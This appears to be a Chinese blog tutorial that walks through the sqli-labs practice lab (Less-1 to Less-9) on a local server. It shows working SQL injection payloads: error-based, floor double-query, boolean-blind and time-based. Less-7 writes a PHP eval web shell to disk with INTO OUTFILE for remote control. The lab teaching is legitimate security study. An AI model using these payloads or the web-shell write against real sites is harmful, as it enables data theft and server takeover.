Sqli 注入点解析
目录
Less-5: 单引号字符型+固定输出信息 (floor报错注入&盲注)
先附上sqli的源代码:链接: https://pan.baidu.com/s/1d2rZVg5hz0ZBv2yg-UoArw 密码: 5w9y
我是在本地用phpstudy搭的一个环境。
Less-1: 字符型注入
输入 http://127.0.0.1/sqli/Less-1/?id=1'
发生了报错,可以知道存在注入,通过报错信息,我们可以猜到sql查询的源代码
select*from security where id=' $_GET[id] ' limit 0 ,1
我们找到了注入点之后就可以进行注入了,union注入,盲注等等都可以。
http://127.0.0.1/sqli/Less-1/?id=1' and 1=2 #
// and 1=2 就是注入点,我们就可以用工具进行注入了
http://127.0.0.1/sqli/Less-1/?id=1' #inject# #
Less-2: 数字型注入
我们发现输入1 and 1=1 和 1 and 1=2 页面不一样,所以页面存在注入漏洞
http://127.0.0.1/sqli/Less-2/?id=1 and 1=1
http://127.0.0.1/sqli/Less-2/?id=1 and 1=2在后来的注入过程中,发现语句后面还有 limit 0 ,1 。所以可以猜到sql查询的源代码
select * from security where id=$_GET[id] limit 0,1我们找到了注入点之后就可以进行注入了,union注入,盲注等等都可以。
http://127.0.0.1/sqli/Less-2/?id=1 and 1=2 #
// and 1=2 就是注入点,我们就可以利用工具进行注入了
http://127.0.0.1/sqli/Less-2/?id=1 #inject# #
Less-3: 单引号字符型+括号
我们输入 http://127.0.0.1/sqli/Less-3/?id=3' 出现了报错。
所以存在注入,从报错信息我们可以猜到sql查询源代码
select * from security where id=('$_GET[id]') limit 0,1我们找到了注入点之后就可以进行注入了,union注入,盲注等等都可以。
http://127.0.0.1/sqli/Less-3/?id=3') and 1=2 #
// and 1=2 就是注入点,我们就可以利用工具注入了
http://127.0.0.1/sqli/Less-3/?id=3') #inject# #Less-4: 双引号字符型+括号
我们输入 http://127.0.0.1/sqli/Less-4/?id=1' 发现页面没有发生报错,猜想,可能是过滤了 ' 。
接着,我们再输入 http://127.0.0.1/sqli/Less-4/?id=1" ,页面报错,知道存在SQL注入。
从报错信息中我们可以猜到其sql查询源代码
select * from security where id=(" $_GET[id] ") limit 0,1我们找到了注入点之后就可以进行注入了,union注入,盲注等等都可以。
http://127.0.0.1/sqli/Less-4/?id=1") and 1=2 #
// and 1=2 就是注入点,我们就可以利用工具进行注入了
http://127.0.0.1/sqli/Less-4/?id=1") #inject# #Less-5: 单引号字符型+固定输出信息 (floor报错注入&盲注)
输入 http://127.0.0.1/sqli/Less-5/?id=1' 发现页面报错。
所以存在SQL注入,可以猜到sql查询的源代码。
select * from security where id='$_GET[id]' limit 0,1咦,这不是和Less-1是一样的吗?哦不,页面显示的信息有点不一样!最后我们发现无论输入什么正确的信息,页面都只显示 You are in .....
于是我们猜测,页面的输出信息是固定的。当sql查询语句正确时,就返回一个固定的信息。当sql查询语句错误时,就不显示。当sql语句有错时,页面就会报出sql语句的错!为了验证这个,我们看下源代码。果然,证实了我们的猜想!
那么,这种情况下我们怎么进行注入呢?
这种情况union注入是行不通的。因为我们只能通过order by知道有3列,而不知道多少列是显示列。
那盲注呢,我们可以通过页面是否显示来判断我们的输入是否正确,当我们的sql正确时,就显示you are in....。当我们的sql语句错误是,就不显示。
我们找到了注入点之后就可以进行盲注了!
http://127.0.0.1/sqli/Less-1/?id=1' and 1=2 #
// and 1=2 就是注入点,我们就可以在注入点的位置插入判断语句了
http://127.0.0.1/sqli/Less-1/?id=1' #inject# #这题,我们网上的另一个好的解法就是利用双注入!双注入其实也就是floor报错注入。是利用count(),rand(),floor(),group by这几个函数结合在一起发生的漏洞,缺一不可!
双查询注入就是两个嵌套的查询,即 select ....(select .....) ,里面的那个select被称为子查询,外面的那个select叫做父查询。执行顺序是先执行子查询,然后执行父查询。
下面是payload
// 我们可以将 user() 改成任何函数,以获取我们想要的信息
http://127.0.0.1/sqli/Less-1/?id=1' and (select 1 from (select count(*) from information_schema.tables group by concat(user(),floor(rand(0)*2)))a) #
//将其分解
(select 1 from (Y)a)
Y= select count(*) from information_schema.tables group by concat(Z)
Z= user(),floor(rand(0)*2)Less-6: 双引号字符型+固定输出信息
输入 http://127.0.0.1/sqli/Less-6/?id=1" 页面发生了报错
所以存在SQL注入,可以猜到sql查询的源代码。
select * from security where id="$_GET[id]" limit 0,1可以利用 1"# 进行绕过,后来发现和Less-5一样,页面输出固定的信息。所以我们可以利用Less-5相同的解法,只不过把Less-5里面绕过的 ' 换成 " 即可!
Less-7: 单引号+双括号
输入 1' 页面报错,但是没有提示出错原因,只是说有错误,很明显,是程序员把错误都给统一处理为You have an error in your SQL syntax 了。
于是猜测可能是字符型的,所以输入 1'# ,页面报错!心想,可能过滤了#,于是换成 1'--+ ,发现还是报错了,有可能把注释符都给过滤了吧!于是我们再输入 1' and '1'='2 看看页面的显示,如果页面不正常显示,说明就是字符型的注入了,只不过是把注释符都给过滤了。可是,页面显示正常!! 这就奇怪了,于是我偷偷的看了下源码,发现,参数用两个括号和单引号保护住了!
于是,我们可以这样构造payload
http://127.0.0.1/sqli/Less-7/?id=1')) and 1=2#
发现页面还是显示报错!
于是,我们继续看了下源代码!发现只有当我们的sql查询语句能查询到数据的时候,就返回固定的 You are in ... Use outfile......,当我们的sql查询语句错误或者返回的是空数据的时候,就返回固定的 You have an error in your SQL stntax。
那样的话,我们构造的payload就查询不到任何数据了。那么,这种情况下我们该如何解呢?我们看到当我们的sql语句能查询到数据的时候他的提示信息, Use outfile ! 是不是要利用 outfile 这个函数呢?outfile 这个函数的用法是 select A into outfile B 。意思就是将A写入B中,A可以是任意的文本内容,也可以是数据库查询到的数据,B是一个绝对路径的文件!
于是,我们可以构造这样的payload
// 意思就是读取表users的数据,写入到e盘的4.txt文件中
http://127.0.0.1/sqli/Less-7/?id=1')) union select * from users into outfile "e:\4.txt" #
// 我们可以将一句话木马写入,然后用菜刀连接,获得shell
http://127.0.0.1/sqli/Less-7/?id=1')) union select 1,('<?php @eval($_POST[aa]) ?>'),3 into outfile "e:\5.txt" #
Less-8: Boolean型盲注
直接看源代码吧!
通过源代码我们知道,吧参数当成字符型处理。当sql查询语句正确的时候,返回You are in..... 当sql语句错误或没查询到任何数据时,不显示任何东西!所以,我们可以利用boolean行盲注来判断,根据页面是否显示数据来判断我们的sql语句是否正确!
boolean盲注就是利用 substring() ,ascii() ,length() 这几个函数,结合二分法来判断数据的!手工boolean盲注很麻烦,可以利用工具来进行盲注!下面给出盲注的基本代码
http://127.0.0.1/sqli/Less-1/?id=1' and 1=2 #
// and 1=2 就是注入点,我们就可以用工具进行注入了
http://127.0.0.1/sqli/Less-1/?id=1' #inject# #
// 判断username列的第一个数据长度,第二个数据 limit 2,1 ,第三个数据 limit 3,1
http://127.0.0.1/sqli/Less-1/?id=-1' and (select length(username) from admin limit 1) >5 #
// 判断username列的第一个数据的第一个字符的ascii值
http://127.0.0.1/sqli/Less-1/?id=-1' and (select ascii(username) from admin limit 1)>97 #
// 判断username列的第一个数据的第2个字符的ascii值
http://127.0.0.1/sqli/Less-1/?id=-1' and (select ascii(substring(username,2,1)) from admin limit 1)>97 #
// 判断username列的第二个数据的第2个字符的ascii值
http://127.0.0.1/sqli/Less-1/?id=-1' and (select ascii(substring(username,2,1)) from admin limit 2,1)>97 #Less-9: 延时注入
直接看源代码
从源代码中我们知道,把参数当成了字符来处理。无论我们的查询语句是否正确,都返回固定的一个信息: You are in ...........
所以,这种情况下我们可以利用延时注入,根据页面的响应时间来判断我们的输入是否正确!延时注入主要是利用 if(条件,true时执行,false时执行) 函数。延时注入比boolean盲注更加的耗费时间,因为我们要时间等待页面的响应。所以,我们进行延时注入也一般是利用工具来注入!下面的延时注入的基本思路的代码
// 判断当前数据库的第一个字符的ascii是否大于100,如果大于100,页面立马响应,否则3秒后响应
http://127.0.0.1/sqli/Less-9/?id=1' and if (ascii(substr(database(),1,1))>100,1,sleep(3))#
相关文章
- Android so注入( inject)和Hook(挂钩)的实现思路讨论
- SQL注入篇——对information_schema数据库的解析
- Spring源码解析(五)Spring 加载bean 依赖注入
- 防止sql注入,过滤敏感关键字
- Java-Spring集合注入
- Spirng setter 注入简单
- 依赖注入在 dotnet core 中实现与使用:5. 使用支持 Unicode 的 HtmlEncoder
- 详解 Spring 3.0 基于 Annotation 的依赖注入实现--转载
- 详解 Spring 3.0 基于 Annotation 的依赖注入实现--转载
- C#参数化(防止SQL注入)
- SQL注入写入一句话php(outfile方式)&中国菜刀连接